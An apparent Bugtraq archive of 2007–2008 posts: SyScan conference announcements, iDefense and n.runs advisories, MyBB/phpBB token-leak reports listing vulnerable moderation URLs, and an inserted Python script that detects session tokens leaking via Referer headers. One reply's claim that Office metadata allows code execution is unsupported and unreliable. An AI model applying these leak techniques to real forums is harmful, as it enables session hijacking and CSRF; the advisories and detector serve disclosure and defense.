Dates for SyScan'09

2008-12-02 Thread [EMAIL PROTECTED]

dear all

There will be 4 SyScan'09 conferences next year in 4 different exciting 
countries in Asia. They are as follows:


SyScan'09 Shanghai: 14th and 15th May 2009
SyScan'09 Hong Kong: 19th and 20th May 2009
SyScan'09 Singapore: 2nd and 3rd July 2009
SyScan'09 Taiwan: 7th and 8th July 2009

Do keep a lookout for more information at www.syscan.org. We will be 
announcing the CFP very soon.


--
Thank you
Thomas Lim
Organiser
SyScan'08
www.syscan.org



MyBB 1.4.3 my_post_key Disclosure Vulnerability

2008-11-25 Thread [EMAIL PROTECTED]

##
# MyBB 1.4.3 my_post_key Disclosure Vulnerability by NBBN (http://nbbnsblog.co.cc)
##

Vendor: http://mybboard.net
Date: November 25, 2008

These URLs contain "my_post_key". Moderators and admins use them
sometimes, depending on what they want to do with a thread.

my_post_key is used to perform various actions and to prevent CSRF.

These pages show the posts of the users. If some of these posts have
pictures, the referrer will be transferred to the server of the images.

#Vuln URLs#
http://localhost/mybb/moderation.php?action=mergeposts&tid=1&modtype=thread&my_post_key=[key]
http://localhost/mybb/moderation.php?action=split&tid=1&modtype=thread&my_post_key=[key]
http://localhost/mybb/moderation.php?action=deleteposts&tid=1&modtype=thread&my_post_key=[key]

Finally, an attacker has the postkey, and can perform some interesting
moderator or administrator actions with CSRF.




Re: Re: Re: Re: Opera 9.6x file:// overflow

2008-11-19 Thread [EMAIL PROTECTED]

If I open a specially crafted HTML file - ok, the exploit is working,
but if I put that file on the server and receive it from the network
with my Opera,

the exploit does not work!

why???





iDefense Security Advisory 10.30.08: Novell eDirectory NCP Get Extension Information Request Memory Corruption Vulnerability

2008-10-30 Thread [EMAIL PROTECTED]

iDefense Security Advisory 10.03.08
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 03, 2008

I. BACKGROUND

Novell eDirectory is a cross-platform directory server. NetWare Core
Protocol, commonly referred to as NCP, is used by eDirectory to
synchronize data between servers in the directory tree. NCP supports
various request types, one of which is the 'Get NCP Extension
Information By Name Request.'

For more information, see the vendor's site found at the following link.

http://www.novell.com/products/edirectory/

II. DESCRIPTION

Remote exploitation of a memory corruption vulnerability in Novell
Inc.'s eDirectory could allow an attacker to execute arbitrary code
with the privileges of the affected service.

The vulnerability exists due to an area of heap memory being used after
it has already been freed. By sending malformed data it is possible to
cause an area of heap memory to be freed by one thread, and then reused
after another thread allocates the same area of memory. This results in
the original thread operating on the data changed by the second thread,
which may lead to the execution of arbitrary code.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the affected service, usually SYSTEM. In
order to trigger this vulnerability, an attacker needs to send a series
of specifically timed requests and have some degree of control of the
memory layout of the process. In Labs testing, it was often difficult
to reliably trigger the vulnerability. While difficult, the possibility
of executing arbitrary code should not be ruled out.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in eDirectory
version 8.8 SP2 for Windows. The Linux version does not appear to be
affected. Previous versions may also be affected.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

Novell has released a patch for this vulnerability and advises that all
users of Novell eDirectory should update.

http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5037180.html
http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5037181.html

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

03/10/2008  Initial vendor notification
03/14/2008  Initial vendor reply
10/03/2008  Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.


n.runs-SA-2008.009 - Eaton MGE OPS Network Shutdown Module - authentication bypass vulnerability and remote code execution

2008-10-27 Thread [EMAIL PROTECTED]

n.runs AG
http://www.nruns.com/  security(at)nruns.com
n.runs-SA-2008.009   27-October-2008


Vendor: Eaton MGE office protection systems
Affected Products:  Network Shutdown Module version 3.10
Vulnerability:  authentication bypass vulnerability and remote code
execution
Risk:   High


Vendor communication:


  2008/08/13  initial notification of EATON MGE Office Protection
              Systems (MGEOPS)
  2008/08/20  second notification of MGEOPS
  2008/08/20  MGEOPS confirmation of receiving information
  2008/08/25  receiving patch proposal from MGEOPS
  2008/08/29  confirmation of proper patch, asking of release date
  2008/09/02  awaiting feedback regarding release date of the patch
  2008/09/18  patch and new version undergoing QA process of MGEOPS,
              still no release date known
  2008/10/07  another request regarding the release date
  2008/10/21  MGEOPS informs n.runs AG about release of the new
              software version
  2008/10/27  n.runs AG releases this advisory


Overview:

EATON MGE Office Protection Systems designs and manufactures secured
power products and solutions for enterprises, small business and homes.
The Network Shutdown Module continuously waits for information from the
Management Proxy or Management Card connected to the EATON UPS, warns
administrators and users if AC power fails, and proceeds with a graceful
system shutdown before the end of battery backup power is reached.

Description:

Remote exploitation of an authentication bypass vulnerability could
allow an attacker to execute arbitrary code.

In detail, the following flaw was determined:

- Custom actions can be added to the MGE frontend without authentication
  required (pane_actionbutton.php)
- Actions can be executed (tested) without authentication required
  (exec_action.php)


Impact:

This problem can lead to a remote file execution vulnerability. It can
allow an attacker to add and execute custom actions. The commands to be
executed are included within the added action.

The vulnerability is present in MGE Network Shutdown Module software
versions prior to 3.10 build 13.

Solution:

EATON MGE Office Protection Systems has issued an update to correct this
vulnerability. A new version of the software (version 3.20) can be found at:
http://download.mgeops.com/explore/eng/network/net_sol.htm


Credits:
Bug found by Jan Rossmann and Jan Wagner of n.runs AG.


References:
This Advisory and Upcoming Advisories:
http://www.nruns.com/security_advisory.php

Subscribe to the n.runs newsletter by signing up to:
http://www.nruns.com/newsletter_en.php


About n.runs:
n.runs AG is a vendor-independent consulting company specialising in the
areas of: IT Infrastructure, IT Security and IT Business Consulting. In
2007, n.runs expanded its core business area, which until then had  been
project based consulting, to include the development of high-end
security solutions.
Application Protection System - Anti Virus (aps-AV) is the first
high-end security solution that n.runs is bringing to the market.

Copyright Notice:
Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
[EMAIL PROTECTED] for permission. Use of the advisory constitutes
acceptance for use in an "as is" condition. All warranties are excluded.
In no event shall n.runs be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages, even if n.runs has been advised of the possibility of
such damages.

Copyright 2008 n.runs AG. All rights reserved. Terms of use apply.





n.runs-SA-2008.008 - Internet Explorer HTML Object Memory Corruption and Remote Code Execution

2008-10-21 Thread [EMAIL PROTECTED]

n.runs AG
http://www.nruns.com/  security(at)nruns.com
n.runs-SA-2008.008   21-October-2008



Vendor: Microsoft
Affected Products:  Internet Explorer 6
Internet Explorer 7
Windows XP SP2 & SP3
Windows 2000 SP4
Windows 2003 SP1
Vulnerability:  Remote Code execution
Risk:   High



Overview

A remote code execution vulnerability exists in Internet Explorer due to
accesses to uninitialized memory in certain cases of DHTML constructs. As
a result, memory may be corrupted in such a way that an attacker could
execute arbitrary code in the context of the logged-on user.


Impact

An attacker could exploit the vulnerability by constructing a specially
prepared website. When a user views the web page, the vulnerability
could allow remote code execution. An attacker who successfully
exploited this vulnerability could gain the same user rights as the
logged-on user.


Solution

Microsoft has issued an update to correct this vulnerability. More 
details can be found at:

http://www.microsoft.com/technet/security/bulletin/MS08-058.mspx



Vendor communication:

   2008/07/07   Thierry sends notification to Microsoft
   2008/07/07   Acknowledgement and Receipt
   2008/10/14   Microsoft publishes



Credits
Vulnerability discovered by Thierry Zoller




Advisories can be found at : http://www.nruns.com/security_advisory.php







iDefense Security Advisory 10.14.08: Sun Java Web Proxy Server FTP Resource Handling Heap-Based Buffer Overflow

2008-10-15 Thread [EMAIL PROTECTED]

iDefense Security Advisory 10.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 09, 2008

I. BACKGROUND

Sun Microsystems Inc's Java System is a collection of server
applications bundled together. One such server application included is
the Web Proxy Server. This software implements proxy services including
HTTP and SOCKSv5.

For more information, visit
http://www.sun.com/software/products/web_proxy/home_web_proxy.xml.

II. DESCRIPTION

Remote exploitation of a heap based buffer overflow in Sun Microsystems
Inc.'s Sun Java Web Proxy could allow an attacker to execute arbitrary
code.

A heap based buffer overflow exists in the handling of FTP resources.
Specifically the vulnerability resides within the code responsible for
handling HTTP GET requests.

III. ANALYSIS

Exploitation of this issue allows an attacker to execute arbitrary code
on the server. An attacker would need to locate the vulnerable server
and construct a malicious HTTP GET request. The attacker would then
send the HTTP GET request to the Sun Java Web Proxy Server and upon
processing the request execution of arbitrary code would be possible.

IV. DETECTION

Sun Java System Web Proxy Server 4.0 through 4.0.7 is vulnerable in the
following versions:

 SPARC Platform prior to patch 120981-15
 x86 Platform prior to patch 120982-15
 Linux prior to patch 120983-15
 HP-UX prior to patch 123532-05
 Windows prior to patch 126325-05

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

Sun Microsystems has officially addressed this vulnerability with Alert
# 242986.

For more information, consult their bulletin at the following URL:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-242986-1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-4541 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/27/2008  Initial vendor notification
05/27/2008  Initial vendor response
10/09/2008  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Joxean Koret.




iDefense Security Advisory 10.14.08: Microsoft Visual Basic for Applications - Multiple Vulnerabilities

2008-10-15 Thread [EMAIL PROTECTED]

iDefense Security Advisory 10.14.08
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 14, 2008

I. BACKGROUND

Microsoft VBA is an implementation of the Microsoft Visual Basic
programming language for developing client desktop packaged applications
and integrating them with existing data and systems. VBA is a built-in
feature of Microsoft Office. For more information, please visit the
following web page:

http://msdn.microsoft.com/en-us/isv/bb190538.aspx

II. DESCRIPTION

Several vulnerabilities exist in Microsoft Corp.'s Office Visual Basic
for Applications (VBA) which could allow remote exploitation by an
attacker. Exploitation could allow the execution of arbitrary code with
the privileges of the current user.

The types of vulnerabilities include heap overflows, memory corruption,
invalid array indexing, and integer overflow.

These vulnerabilities exist in the handling of an object embedded in an
Office document. When processing this object, the VBA module does not
validate any of several values correctly. By crafting an object that
contains a specific value, corruption can be caused. This leads to a
potentially exploitable condition.

III. ANALYSIS

Exploitation allows an attacker to execute arbitrary code in the context
of the currently logged-on user. To exploit this vulnerability, the
attacker must persuade a user to open a specially crafted Office
document.

Likely attack vectors include sending the file as an e-mail attachment
or linking to the file on a website. By default, systems with Office
2000 installed will open Office documents from websites without
prompting the user. This allows attackers to exploit this vulnerability
without user interaction. Later versions of Office do not open these
documents automatically unless the user has chosen this behavior.

Using the Office Document Open Confirmation Tool for Office 2000 can
prevent Office files from opening automatically from websites. Use of
this tool is highly recommended for users still using Office 2000.

Generally one needs to set Macro security Level to Medium to run VBA
Macros, but that's not applicable for this vulnerability. This
vulnerability can be exploited with the default High Macro Security
Level.

IV. DETECTION

iDefense confirmed the existence of these vulnerabilities in the
following versions of Microsoft Excel: 2000-SP3, XP-SP3, 2003-SP3.
Excel 2007 and 2007-SP1 were not vulnerable.

V. WORKAROUND

Restrict access to VBE6.dll by executing:

Echo y|cacls "%ProgramFiles%\common files\microsoft shared\vba\vba6\vbe6.dll" /E /P everyone:N

Impact of workaround: Office file with VBA content can't be loaded.

VI. VENDOR RESPONSE

Microsoft has officially addressed this vulnerability with Security
Bulletin MS08-057. For more information, consult their bulletin at the
following URL.

http://www.microsoft.com/technet/security/bulletin/ms08-057.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-3477 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

04/17/2007  Initial vendor notification for earliest vulnerability
04/18/2007  Initial vendor response
10/14/2008  Coordinated public disclosure

IX. CREDIT

The heap buffer overflow vulnerability was independently discovered by
Lionel d'Hauenens of Laboskopia (reported through iDefense VCP program)
and Jun Mao of iDefense Labs.

The discoverer of the remaining vulnerabilities wishes to remain
anonymous.




n.runs-SA-2008.005 - Apple Inc. - CoreServices Framework’s CarbonCore Framework - Arbitrary Code Execution (remote)

2008-08-01 Thread [EMAIL PROTECTED]
r the
credits that n.runs AG would like to have.
  2008/07/13  n.runs AG replies with the following statement: “As I
              [Sergio Alvarez] said and you agreed in my first
              e-mails, before sending any of my findings, whether you
              found them internally or somebody else reported the same
              bugs that I'm reporting, you (Apple) have to credit me
              for my findings for the simple reason that I'm reporting
              them to you instead of releasing them to the public
              while the bugs are not fixed. That said, I've checked
              all the credits given in "iPhone 2.0 and iPod touch 2.0"
              (http://support.apple.com/kb/HT2351) and the ones given
              in "QuickTime 7.5" (http://support.apple.com/kb/HT1991),
              and I haven't been credited in any of them. This is a
              clear violation of our RFP. If by Monday, July 14th 2008
              the proper credits are not given to me, I'll release all
              the vulnerabilities and bugs that I've reported to you
              and also the ones I didn't report yet by Tuesday, July
              15th 2008.”
  2008/07/15  Apple Inc. asks n.runs AG not to make their findings
              public and also publishes the credits for one of the
              issues reported. Apple also provides a status report for
              the previous findings.
  2008/07/15  n.runs AG provides further use-cases and attack vectors
              information to Apple Inc.
  2008/07/23  Apple Inc. creates a new security ID for the use-cases
              and attack vectors reported as a design issue to fix.
  2008/07/23  n.runs thanks Apple Inc. for the feedback and asks for a
              status report update
  2008/08/01  Apple Inc. notifies n.runs AG of the imminent release of
              an update and sends the related advisory and credits.
              (The update and credits were already available at the
              time n.runs AG read the email sent by Apple Inc.)
  2008/08/01  n.runs AG releases this advisory



Overview:

Carbon is a set of C APIs offering developers an advanced user interface 
toolkit, event handling, access to the Quartz 2D graphics library, and 
multiprocessing support. Developers have access to other C and C++ APIs, 
including the OpenGL drawing system and the Mach microkernel.


CarbonCore gathers together a number of lower-level Mac OS Toolbox 
managers. Some of these are deprecated but essential to porting to Carbon.


CarbonCore includes the old Device Manager, Date and Time Utilities, the 
Finder interface, Mixed Mode, CFM, the Thread Manager, the Collection 
Manager, the Script Manager, and more. Most of the Toolbox defines are 
in here.


Description:

A remotely exploitable vulnerability has been found in the file name 
parsing code.


More specifically, passing a long file name to the CarbonCore framework 
file management API will trigger a stack buffer overflow.



Impact:

This problem can lead to remote arbitrary code execution if an attacker 
carefully crafts a file that exploits the aforementioned vulnerability. 
n.runs AG illustrated the exploitation using Safari and Mail - both 
present on a standard OS X installation - to demonstrate the risks. The 
attack surface is however not limited to these two applications: any 
software component that makes use of the CarbonCore framework may allow 
arbitrary code execution. The vulnerability is present in Apple 
CarbonCore Framework prior to the update released on Aug 1st, 2008.


Solution:

The vulnerability was reported on Apr 1st, 2008 and Apple Security 
Update has been issued to solve this vulnerability on Aug 1st, 2008. For 
detailed information about the fixes, follow the link in the references 
section [1] of this document.




Credits:
Bug found by Sergio ‘shadown’ Alvarez of n.runs AG.


References:
[1] http://support.apple.com/kb/HT2647


Confirmed Program for SyScan'08 Hong Kong

2008-05-12 Thread [EMAIL PROTECTED]

dear all

the program for SyScan'08 Hong Kong is confirmed.

date: May 29th and 30th, 2008
venue: Langham Place Hotel, Hong Kong

Program:
Attacking Telco Core Network - Philippe Langlois (TSTF)
Real World Kernel Pool Exploitation - Kostya Kortchinsky (Immunity)
Cyber Crime: Follow the Money - Pedro Bueno (McAfee)
The Powerful Evil on Mobile Phone - Nanik (COSEINC)
Securing Your Web Application Codes - Kurt Grutzmacher (Pacific Gas)
Hacking RFiD Devices: Octopus Card?? - Adam Laurie (RFIDI0T.org)
Attacking Anti-Virus - Sowhat (Nevis Lab)
Anti-Forensic: Leaving the Police No Trails (the Grugq)
Media Security in VOiP Systems - Shao Weidong (Secure Minded Consulting)
Rambling on the Private Data Security: No more Eason Chan - Sun Bing

Look out for SyScan'08 Singapore and SyScan'08 Taiwan.

--
Thank you
Thomas Lim
Organiser
SyScan'08
www.syscan.org



SyScan'08 Singapore - Call for Paper

2008-04-21 Thread [EMAIL PROTECTED]
the Call for Paper for SyScan'08 Singapore will close in 10 days' time 
on 30th April 2008.


the program for SyScan'08 Hong Kong is out. do not miss the first hacker 
conference in this exotic "pearl of the orient" city.



CALL FOR PAPERS/TRAINING

SyScan'08 Singapore will be held on July 3rd and 4th at Novotel Clarke 
Quay.


CFP COMMITTEE
The Call for Papers committee for SyScan’08 comprises the following 
personnel:


1. Thomas Lim – Organiser of SyScan and CEO of COSEINC
2. Dave Aitel – Founder and CTO of Immunitysec
3. Marc Maiffret – Ex-Founder and Chief Hacking Officer of eEye
4. Matthew “Shok” Conover – Symantec

The CFP committee will review all submissions and determine the final 
list of speakers for SyScan’08.


CONFERENCE TOPICS
The focus for SyScan’08 will include the following:

Operating Systems
• Vista
• Linux
Mobile Devices/Embedded systems
• SmartPhones
• PDAs
• Game Consoles
Web 2.0
• Web services
• PHP
• .Net
• Web applications
Networking/Telecommunication
• VoIP
• 3G/3.5G network
• IPv6
• WLAN/WiFi
• GPRS
Malware
BotNets
Virtualization

Any topics that will catch the attention of the CFP committee and/or the 
world.


TRAINING TOPICS
SyScan’08 training topics will focus on the following areas:

Web Applications
• .Net applications
• Java applications
Networks
• VoIP
• 3G/3.5G network
• IPv6
• WLAN/WiFi
• GPRS
Securing Windows/Linux Systems
Databases
Storage

PRIVILEGES
Speakers’ Privileges:
• Return economy class air-ticket for one person.
• 3 nights of accommodation.
• Breakfast, lunch and dinner during conference.
• After-conference party.
• A very healthy dose of alcohol and fun.
• S$500 cash for speakers with brand new presentations.

Trainers’ Privileges:
• 50% of net profit of class.
• 2 nights of accommodation (conference).
• After-conference party.
• A very healthy dose of alcohol and fun.

Please note that the net profit for each class is determined by the 
difference between the total fee collected for each class and the total 
expenses incurred for each class. The expenses of each class would 
include the return economy air-ticket of the trainer, 3 nights of 
accommodation (training) and the rental of the training venue.



CFP SUBMISSION:
CFP submission must include the following information:

1) Brief biography including list of publications and papers published 
previously or training classes conducted previously.


2) Proposed presentation/training title, category, synopsis and 
description.


3) Contact Information (full name, alias, handler, e-mail, postal 
address, phone, fax, photo, country of origin, special dietary 
requirement).


4) Employment and/or affiliations information.

5) Any significant presentation and educational/training 
experience/background.


6) Why is your material different or innovative or significant or an 
important tutorial?


Please note that all speakers will be allocated 50 minutes of 
presentation time. Any speakers that require more time must inform the 
CFP committee during the CFP submission.


Training classes will be 2 full days. Please inform the CFP committee if 
your class is shorter or longer than 2 days during your CFP submission.


All submissions must be in English in either MS Office or PDF format. 
The more information you provide, the better the chance for selection. 
Please send submission to [EMAIL PROTECTED]




IMPORTANT DATES
Singapore
Final CFP Submission – 30th April 2008
Notification of Acceptance – 30th May 2008.
Final Submission for Accepted Presentation Material (Speakers) – 15th 
June 2008



OTHER INFORMATION
Please feel free to visit SyScan website to get a feel what this 
conference is all about – SHARE AND HAVE FUN!


By agreeing to speak at the SyScan'08 you are granting SyScan Pte. Ltd. 
the rights to reproduce, distribute, advertise and show your 
presentation including but not limited to http://www.syscan.org, printed 
and/or electronic advertisements, and all other mediums.


--
Thank you
Thomas Lim
Organiser
SyScan'08
www.syscan.org



phpBB 2.0.23 Session Hijacking Vulnerability

2008-03-19 Thread [EMAIL PROTECTED]

+
+ phpBB 2.0.23 Session Hijacking Vulnerability +
+ found by NBBN 13 Mar 2008 +
+




::Information about this vulnerability
If a moderator or an admin closes a thread in phpBB 2.0.X, the session id
is sent with GET:


http://site.tld/phpBB2/modcp.php?t=1&mode=lock&sid=[session]

The admin/moderator is then redirected to the thread (with the
session). If an attacker has posted an image in his post, he can see the
referer and so the session id. And if the attacker has a good day and
the admin closes the thread, he can use all admin functions with CSRF.



::Fix

No fix

::Workaround

Upgrade to phpBB3

::Tested under:

phpBB 2.0.23 (localhost)
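The phpBB sid post above and the earlier MyBB my_post_key post describe the same Referer leak: a secret in the query string of the page a moderator lands on is handed to every third-party image host that page embeds. The Python below is an added example, not code from either advisory or from phpBB/MyBB; it shows the board-side fix (strip the token from the redirect target) and the log-side check (flag Referer headers carrying `sid` or `my_post_key` in combined-format access logs). All URLs and log lines are constructed.

```python
"""Referer-leak checks for forum URLs that carry secrets in the query string
(phpBB2's sid session id, MyBB's my_post_key CSRF token).

Board side : a redirect target that still carries the secret leaks it in the
             Referer header to any third-party image embedded in the landing page.
Log side   : on the image host or an egress proxy, the leak is visible as a
             Referer whose query string contains the token.
Sample URLs and log lines are constructed for this example.
"""
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Parameter names taken from the two advisories; never let these travel in a
# GET URL that a browser may later send as a Referer.
SECRET_PARAMS = {"my_post_key", "sid"}

# Apache/nginx "combined" log format: ... "REQUEST" STATUS BYTES "REFERER" "UA"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def secret_params_in_url(url):
    """Return {name: value} for every secret-bearing parameter in url's query."""
    query = urlsplit(url).query
    return {k: v for k, v in parse_qsl(query, keep_blank_values=True)
            if k in SECRET_PARAMS}


def strip_secret_params(url):
    """Return url with the secret-bearing parameters removed.

    This is the shape a board should give any redirect target (the thread the
    moderator lands on after lock/merge/split), so the Referer attached to the
    page's image fetches carries nothing sensitive.
    """
    parts = urlsplit(url)
    kept = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k not in SECRET_PARAMS]
    return urlunsplit(parts._replace(query=urlencode(kept)))


def find_referer_leaks(log_lines):
    """Scan combined-format access log lines for Referers carrying a secret.

    Returns one dict per leaking line; the token value is masked so the
    finding itself does not re-leak it.
    """
    findings = []
    for line in log_lines:
        m = COMBINED_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line: skip rather than guess
        referer = m.group("referer")
        if referer in ("", "-"):
            continue
        leaked = secret_params_in_url(referer)
        if not leaked:
            continue
        request_parts = m.group("request").split()
        fetched = request_parts[1] if len(request_parts) > 1 else m.group("request")
        findings.append({
            "client": m.group("ip"),
            "board_host": urlsplit(referer).netloc,
            "params": sorted(leaked),
            "masked": {k: v[:4] + "..." for k, v in leaked.items()},
            "fetched": fetched,
        })
    return findings


# Constructed sample: an image host's access log. Lines 1 and 3 are the leak
# (a moderator's browser fetched an embedded image right after a moderation
# action); line 2 is an ordinary visitor whose Referer carries nothing secret.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Mar/2008:10:01:02 +0000] "GET /img/sig.png HTTP/1.1" 200 812 '
    '"http://site.tld/phpBB2/modcp.php?t=1&mode=lock&sid=3f9a1c77e0b2d4a5" "Mozilla/5.0"',
    '198.51.100.9 - - [13/Mar/2008:10:02:10 +0000] "GET /img/sig.png HTTP/1.1" 200 812 '
    '"http://site.tld/phpBB2/viewtopic.php?t=1" "Mozilla/5.0"',
    '203.0.113.7 - - [25/Nov/2008:14:20:33 +0000] "GET /img/avatar.gif HTTP/1.1" 200 4010 '
    '"http://localhost/mybb/moderation.php?action=split&tid=1&modtype=thread'
    '&my_post_key=deadbeefcafef00d" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_referer_leaks(SAMPLE_LOG):
        print(finding)
    print(strip_secret_params(
        "http://site.tld/phpBB2/modcp.php?t=1&mode=lock&sid=3f9a1c77e0b2d4a5"))
```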


SyScan'08 Call for Paper/Training

2008-02-13 Thread [EMAIL PROTECTED]

CALL FOR PAPERS/TRAINING

SyScan'08 Hong Kong will be held on May 29th and 30th at Langham Place.
SyScan'08 Singapore will be held on July 3rd and 4th at Novotel Clarke Quay.

CFP COMMITTEE
The Call for Papers committee for SyScan’08 comprises the following 
personnel:


1. Thomas Lim – Organiser of SyScan and CEO of COSEINC
2. Dave Aitel – Founder and CTO of Immunitysec
3. Marc Maiffret – Ex-Founder and Chief Hacking Officer of eEye
4. Matthew “Shok” Conover – Symantec

The CFP committee will review all submissions and determine the final 
list of speakers for SyScan’08.


CONFERENCE TOPICS
The focus for SyScan’08 will include the following:

Operating Systems
• Vista
• Linux
Mobile Devices/Embedded systems
• SmartPhones
• PDAs
• Game Consoles
Web 2.0
• Web services
• PHP
• .Net
• Web applications
Networking/Telecommunication
• VoIP
• 3G/3.5G network
• IPv6
• WLAN/WiFi
• GPRS
Malware
BotNets
Virtualization

Additional topics for SyScan’08 Hong Kong:

Security Policy/Best Practices
Legislation
Industry Specifics –
• Finance
• Hotels


Any topics that will catch the attention of the CFP committee and/or the 
world.


TRAINING TOPICS
SyScan’08 training topics will focus on the following areas:

Web Applications
• .Net applications
• Java applications
Networks
• VoIP
• 3G/3.5G network
• IPv6
• WLAN/WiFi
• GPRS
Securing Windows/Linux Systems
Databases
Storage

PRIVILEGES
Speakers’ Privileges:
• Return economy class air-ticket for one person.
• 3 nights of accommodation.
• Breakfast, lunch and dinner during conference.
• After-conference party.
• A very healthy dose of alcohol and fun.
• S$500 cash for speakers with brand new presentations.

Trainers’ Privileges:
• 50% of net profit of class.
• 2 nights of accommodation (conference) (applicable for Singapore only).
• After-conference party.
• A very healthy dose of alcohol and fun.

Please note that the net profit for each class is determined by the 
difference between the total fee collected for each class and the total 
expenses incurred for each class. The expenses of each class would 
include the return economy air-ticket of the trainer, 3 nights of 
accommodation (training) and the rental of the training venue.



CFP SUBMISSION:
CFP submission must include the following information:

1) Brief biography including list of publications and papers published 
previously or training classes conducted previously.


2) Proposed presentation/training title, category, synopsis and description.

3) Contact Information (full name, alias, handler, e-mail, postal 
address, phone, fax, photo, country of origin, special dietary requirement).


4) Employment and/or affiliations information.

5) Any significant presentation and educational/training 
experience/background.


6) Why is your material different or innovative or significant or an 
important tutorial?


Please note that all speakers will be allocated 50 minutes of 
presentation time. Any speakers that require more time must inform the 
CFP committee during the CFP submission.


Training classes will be 2 full days. Please inform the CFP committee if 
your class is shorter or longer than 2 days during your CFP submission.


All submissions must be in English in either MS Office or PDF format. 
The more information you provide, the better the chance for selection. 
Please send submission to [EMAIL PROTECTED]




IMPORTANT DATES
Hong Kong
Final CFP Submission – 29th February 2008
Notification of Acceptance – 30th March 2008.
Final Submission for Accepted Presentation Material (Speakers) – 15th 
April 2008


Singapore
Final CFP Submission – 30th April 2008
Notification of Acceptance – 30th May 2008.
Final Submission for Accepted Presentation Material (Speakers) – 15th 
June 2008



OTHER INFORMATION
Please feel free to visit SyScan website to get a feel what this 
conference is all about – SHARE AND HAVE FUN!


By agreeing to speak at the SyScan'07 you are granting SyScan Pte. Ltd. 
the rights to reproduce, distribute, advertise and show your 
presentation including but not limited to http://www.syscan.org, printed 
and/or electronic advertisements, and all other mediums.


--
Thank you
Thomas Lim
Organiser
SyScan'07
www.syscan.org



SyScan'08 Call For Paper/Training

2007-12-18 Thread [EMAIL PROTECTED]
 send submission to [EMAIL PROTECTED]


*IMPORTANT DATES*
*Hong Kong*
Final CFP Submission – 29th February 2008
Notification of Acceptance – 30th March 2008.
Final Submission for Accepted Presentation Material (Speakers) – 15th 
April 2008


*Singapore*
Final CFP Submission – 30th April 2008
Notification of Acceptance – 30th May 2008.
Final Submission for Accepted Presentation Material (Speakers) – 15th 
June 2008



*OTHER INFORMATION*
Please feel free to visit SyScan website to get a feel what this 
conference is all about – SHARE AND HAVE FUN!


By agreeing to speak at the SyScan'07 you are granting SyScan Pte. Ltd. 
the rights to reproduce, distribute, advertise and show your 
presentation including but not limited to http://www.syscan.org, printed 
and/or electronic advertisements, and all other mediums.



--
Thank you
Thomas Lim
Organiser
SyScan'07
www.syscan.org



Re: AW: MS Office 2007: Digital Signature does not protect Meta-Data

2007-12-13 Thread [EMAIL PROTECTED]



Does this same issue appear in OpenOffice ODF format?  Though it does not 
look like a huge issue, of itself, it is similar to the way Microsoft 
ignores metadata in all files, which is a way to add executable code to 
applications with the names of known MS utilities, like notepad.exe.  If 
the metadata file can be modified in the MS Word properties dialog, it is 
also possible to modify the file in a text editor, and probably get an MS 
document to run arbitrary code when you open it.  This is the impact that 
the original post does not make clear.

Wolf Halton
Halton Security Institute
networkdefense.biz

On Thu, 2007-12-13 at 17:42 +0100, Naujoks, Hans-Dietmar wrote:

> Dear Mr. Poehls,
> 
> I think Microsoft does not consider metadata attached to a document as 
> part of the document and so they decided not to include it in the 
> content protected by the certificate.
> 
> This fits the way we use attaching metadata during the process of 
> categorization to enable retrieval of a document by means and 
> taxonomies of the recipient, not of the author. If instead, as you seem 
> to propose, metadata would be treated as part of the document, 
> attaching the metadata needed for retrieval purposes would invalidate 
> the signature of the document.
> 
> Therefore this time I would go with Microsoft for their solution fits 
> our needs and doesn't compromise the integrity protection of the 
> document itself in any serious way. Just think of it as a sticker 
> placed on the outside of a sealed envelope: You mustn't trust anything 
> on the outside, just look inside the envelope to find the information 
> you can rely on.
> 
> Yours
> H.-D. Naujoks
> TÜV SÜD Informatik und Consulting Services GmbH
> 
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]rg.de]
> Sent: Wednesday, 12 December 2007 11:35
> To: bugtraq@securityfocus.com
